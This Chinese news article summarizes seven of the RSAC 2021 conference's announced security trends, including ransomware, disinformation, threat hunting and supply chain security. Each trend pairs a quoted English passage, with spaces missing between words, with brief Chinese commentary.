美图欣赏 | 设为首页 | 加入收藏 | 网站地图

当前位置:新锦江平台:www.xjj555666.com-电脑中国 > 新闻 > 安全资讯 >

干货!RSAC2021十大安全趋势速览

2021-05-24 09:29|来源:未知 |作者:dnzg |点击:
  新冠疫情如同黑天鹅一般,改变了人们的工作生活。不仅让RSAConference首次以全虚拟化的形式与大家相见,也让人们与网络深层捆绑,网络安全的重要性越发凸显。
 
  RSAConference作为全球瞩目的行业先锋会议,一直是技术研究发展的风向标。今年,官方从2000份早期报告中洞见未来趋势,经过反复的筛选与研判,终于在今年的RSAC2021上重磅发布了新一年度的十大安全趋势。
 
  下面小安就结合原文,逐一为大家介绍RSAC2021十大安全趋势!
 
  趋势1:安全管理岗位角色演变
 
  EvolutionofRoles:Aswe’veseeneveryyear,thereweremanysubmissionsthatspoketotheevolutionoftheCISO,whoisincreasinglyrequiredtohavemorefrequentcommunicationwiththeboard;thus,attendeesatRSAConference2021willhavetheopportunitytolearnaboutthewaysthatCISOscandevelopnewcommunicationsskills.WeareseeingatrendintheriseofChiefProductSecurityOfficers(CPSOs),arolePCmemberMeganSamfordontheSecuringAlltheThingstrackpointedoutisseparatefromaCISO.TheCPSO,“coversthesecurityofwhatacompanysells—buildingsecurityin,bothintermsoffeaturesandsecuredevelopmentthroughoutthelifecycleofaproduct.”
 
  📌小安点评:随着信息安全在企业中地位逐渐提高,安全管理岗位的职责也在随之变化。CISO(首席信息安全官)如今已无法完全适应安全管理需求,紧接着便是CPSO(首席产品安全官)岗位的产生及CIRO(首席信息风险官)的转化。这两种岗位的职责与CISO有一定的差异,但又是企业不可或缺的,那么其所需的技能和素质则是企业及安全圈需要共同探讨的内容。
 
  趋势2:人工智能与机器学习
 
  StraightTalkaboutML&AI:Thisyear’sPCfortheML&AItrackwaspleasedtoseetalksthatfocusedonthepracticalrealitiesofusingAIandML.“Thesearevast,confusingtechnicalareas,andinpreviousyearswesawalotof“magicunicornglitter”—whichmadethisyear’ssubmissionawelcomechange,”wroteDianaKelleyandSaurabhShintre.“Thetrendthisyearwastowardslessonslearned,applicabletakeawaysfororganizationsandpractitionersaswellaslimitationsandissuesaroundpotentialharmsofAI.”KelleyandShintrereallyappreciateseeingmorepracticalusecasesinsubmissionsofferingwaystogenerateandcatchspamusingAItoolslikeGenerativePre-trainedTransformer3(GPT-3),howMLcaninjectfairnessintofederatedlearning,howtostopattacksonadvanceddriving-assistancesystems,andhowMLisinusetodayatlargefinancialservicesinstitutionstoadvancedatavisualizationandautomationtocombatfraud.
 
  📌小安点评:人工智能与机器学习一直是安全行业,特别是学术圈和安全团队研究的当红炸子鸡。而近几年最为迫切需要解决的则是,如何将其成果落地,转化为产品或者企业防护方案。目前国内外我们也看到了一些主打人工智能和机器学习的商业安全产品,同时也看到了一些专攻AI的团队做出的一些人工智能对抗攻击成果,它于安全的未来仍然广阔。
 
  趋势3:信息操纵及其影响
 
  InformationManipulationandItsImpact:Aresoundingthemethisyearisechoedinthetitleofoneofthisyear’sHumanElementsessions:InvisibleSecurity:ProtectingUserswithNoTimetoSpare.Trendingmorethanphishing,though,wasdisinformationcampaigns.AndreaLittleLimbago,PCmemberontheHumanElementtrack,wrote,“Therewerealsoseveralsubmissionsondisinformationcampaignsandtheirsecurityimpact.Ontheonehand,thisisnotsurprisinggiventhewidespreadimpactofthesecampaignsfrommanyofthesamethreatactors.”
 
  📌小安点评:信息操纵也是今年RSAC提出的重要趋势,新冠仍在欧美肆虐,各色社交媒体上虚假信息层出不穷,近期国内的成都49中事件和巴以冲突中的信息战也凸显出信息操纵的影响力和重要性。
 
  趋势4:勒索软件
 
  RansomwareAttacks:GregDaywasnotsurprisedtoseeacontinuedfocusonransomwareintheHackers&Threatstrack.“Wehaveseentheattacksbecomingmoresophisticatedandtargeted.Oftentheyarenowcarryingmultiplepayloadssuchasransomingdataaccessbutalsoeitherresellingthedataonorextortingfurtherfundsunderthreatofpostingnon-publicdatainthepublicdomain,”Daywrote.“Andwhilesomeransomwareisstillfocusedonrandomvictims,othershavebecomefarmoretargeted.Thehealthcareindustryhascertainlyseenthepainfromthis.”
 
  📌小安点评:纵然老生常谈,又不得不谈。本来各国对勒索软件的抓捕查封活动已经使勒索软件增速放缓,Darkside给燃油公司的沉重一击又让大家认识到攻防失衡的现实。相比去年,勒索软件又在“服务质量”上更进一步,甚至还开创了只公开数据作为勒索的新潮流。基础设施,医药健康等公司和机构,未来更需要着力应对这种威胁。
 
  趋势5:共享和如何共享
 
  ShareandShareAlike:SubmissionsreviewedbytheAnalytics,Intelligence&ResponsePCrevealedthatmoreintelligencesharingisneeded.ToddInskeepwrote,“Severalorganizationshavelearnedlessonsthatworkinspecificsectors(liketheCyberThreatAllianceforthecybersecurityindustry)andplantosharelessonsonhowtomakesharingworkbetterandmakeitmorevaluable.Perhapsthemostintriguingthesisisthataligningintelligencesharingtobusinessneedscandrivemorevaluablesharingofinsights.”
 
  📌小安点评:情报业务愈发展,安全圈愈发现情报共享的重要性。为实现1+1>2,仅仅简单的情报共享还不够,需要有更深入的合作和更完善的合作机制。此次提出的趋势便是情报共享,首先呼吁安全圈加大合作,其次便是探讨如何更好地合作。
 
  趋势6:企业安全中的人员、制度及技术变幻
 
  ResilienceofPeople,ProcessesandTechnologies:Resilience,whichiscoretoourindustryandiskeytodefineclearly,washighlightedmoreandmoreinsubmissionsasdiscussionsshifttocalibrationofrisk;indeed,ourRiskManagement&Governancetrackisfullofactionableapproaches.ThechallengeoftherapidfliptoapredominantlydispersedworkforcewassignificantenoughthatwedecidedtohighlightitinthenewSecuringtheRemoteWorkforcetrack,designedtoprovideprescriptiveguidancetothreatsfromahome-basedworkforceandrecommendationsfororganizationsneedingtoadjusttothenormalizationofchangesthathavebeenimplemented.Thetrackwillalsolookintothefutureanddeliverconcreteideastohelporganizationsthriveinaseaofchange.Assessmentshaveshinedthelightonchallengesandopportunitiesfororganizationsthathavequicklypivoted,andcontinuouscontrolsmonitoringisbeingusedtohelpcompaniesraisethebarandevolvecybersecurityresilience.Threathuntingwasasignificant“microtrend”withinthismacrotrendofresilience,withsubmissionsfocusedonproactiveapproachesandpickinguponuntraditionalanddifficult-to-findthreatindicatorslikelateralmovement,exfiltration,compromisedaccounts,C2activitydetection,impossiblejourneys,internalrecon,abnormalprocessesandmanymorenuancedactivitiesastheyworkedtoscanthemselvesinsearchofproblems.Thesignificantuptickon“artofthehunt”submissionswasofgreatinterest,aswastheemploymentofartificialintelligencetoenhancetheworkofhumanhunters.
 
  📌小安点评:天数难测,在企业适应刚刚建立的企业安全策略前,环境和需求就已经产生了变化。不说疫情带来的居家办公潮流,企业自身也在不断调整,而如何使企业适应安全策略,以及如何使安全策略适应不断发展的企业,就成了核心的问题点。
 
  趋势7:供应链安全
 
  SupplyChainSecurity&SoftwareIntegrity:Anothertrendwithinthemacrotrendofresiliencethatbearsitsownreviewissupplychainsecurityand,related,softwareintegrity,particularlyinlightoftheSolarWindsbreachandtheever-growinglistofrelatedbreaches,athemethatwillbetouchedoninmanykeynoteandtracksessions.The2021submissionsexploredtheimplicationsofoursupplychainsonthird-partyrisk,physicalsecurity,operationalsecurityandbusinesscontinuity,andalsoexaminedtheveryrealandgrowinggeopoliticaltensionsonsupplychainresilience.AlwaysseekingactionableguidanceinthematerialputforwardforRSAConferenceattendees,theProgramCommitteewaspleasedtoseesessionsfocusedontheDigitalBillofMaterials(DBoM)andSoftwareBillofMaterials(SBoM)astoolstohelpaddresssupplychainriskmanagementchallengesandpublic-privatecollaborationopportunities.Reliability,codeintegrityandgooddevelopmentpracticesasathemewithinDevSecOps&SoftwareSecuritysubmissionswasalsoatanall-timehighintheproposalsreviewed,pointingtostepsinourcommunitytowardmoresecureapplicationdevelopmentprocesses.
 
  📌小安点评:供应链安全带来的巨大收益已经让攻击者和企业甚至政府都不得不重视它。如今,发生过的供应链安全攻击事件已经切实影响到了企业安全、人身安全甚至国家安全,防范势在必行。而DevSecOps作为产品生命周期安全性的解决方案,也会成为供应链安全中绕不开的话题。
(责任编辑:dnzg)